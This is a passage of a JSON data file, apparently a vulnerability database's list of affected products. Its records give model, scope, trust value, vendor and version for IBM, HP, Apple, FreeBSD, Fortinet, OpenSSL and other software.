"trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "imc uam tam e0406", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "system networking rackswitch g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.9" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.30" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4" }, { "model": "netezza platform software 7.1.0.8-p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "(comware r5319p15", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "36105)" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "bundle of g8264cs image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.16" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.1" }, { "model": "openscape voice trace manage", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.5.0.7" }, { "model": "msr2000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "vcx", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "bigfix remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.7" }, { "model": "ei (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51205)" }, { "model": "openscape desk phone ip hf r0.28", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.5" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "system networking rackswitch g8264t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "1/10gb uplink ethernet switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.8.23.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.7" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1.0" }, { "model": "security network controller 1.0.3387m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "virtual fabric 10gb switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.8.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.2" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.12" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.9" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.6" }, { "model": "security network controller 1.0.3379m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "10.2-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.7" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.17" }, { "model": "10.1-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "6125xlg r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "10.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.10" }, { "model": "bladesystem c-class virtual connect", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.50" }, { "model": "(comware r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59007)" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "hsr6800 (comware r7103p09", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "f5000-a (comware f3210p26", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system fabric si4093 system interconnect module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.8" }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "sonas", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.4" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.5.0.2" }, { "model": "si4093 image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "imc inode e0407", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.34" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize 6.4storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3500v3700" }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.2" }, { "model": "system networking rackswitch g8332", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.21.0" }, { "model": "netezza platform software 7.1.0.4-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "openscape voice r1", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "system networking rackswitch g8124", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.38" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "altavault", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "netezza platform software 7.2.0.4-p3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3" }, { "model": "10.2-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.3" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.9" }, { "model": "netezza platform software 7.2.1.1-p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.41" }, { "model": "smb1910 (comware r1113", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.6" }, { "model": "netezza diagnostics tools", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.10" }, { "model": "hi (comware r5501p21", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "55005)" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "10.1-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.4" }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "qradar incident forensics patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.53" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "virtual fabric 10gb switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.8.22.0" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "system networking rackswitch g8124", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.10" }, { "model": "fortirecorder", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.12" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "70" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9xx5)" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.2" }, { "model": "system networking rackswitch g8264", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "hp850 (comware r2607p51", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "imc wsm e0502p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.2" }, { "model": "6127xlg r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "a6600 (comware r3303p28", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "(comware r1810p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58005)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "moonshot r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.8" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "11.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortirecorder", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "1.5" }, { "model": "flashsystem 9848-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "flashsystem 9840-ae2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.5.0.7" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.9" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.34" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "openscape sbc r", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v7" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014090300" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.6" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.4" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.9" }, { "model": "10.2-beta2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netezza platform software 7.1.0.5-p3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.5.0.7" }, { "model": "security network controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "openscape alarm respons", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6.0.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.5.0.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "forticlient", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.4.0650" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.7" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4.0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.5" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.5" }, { "model": "ei (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "55005)" }, { "model": "5510hi (comware r1120", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.3.1" }, { "model": "g8264cs si fabric image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.16" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.45" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.8" }, { "model": "10.1-beta3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "msr1000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.3" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10" }, { "model": "vsr (comware e0322p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "openscape r", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "4000v7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.5.0.3" }, { "model": "manageability sdk", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.18" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "flashsystem 9846-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.7" }, { "model": "system networking rackswitch g8264cs", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "wx5004-ei (comware r2507p44", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "10.1-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system networking rackswitch g8052", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014111002" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.19" }, { "model": "fortiap", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "openscape r1", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "4000v7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.12" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.6" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "openscape sbc r", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.0" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "4800g (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "(comware r3113p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51307)" }, { "model": "9.3-release-p21", "scope": null, "trust": 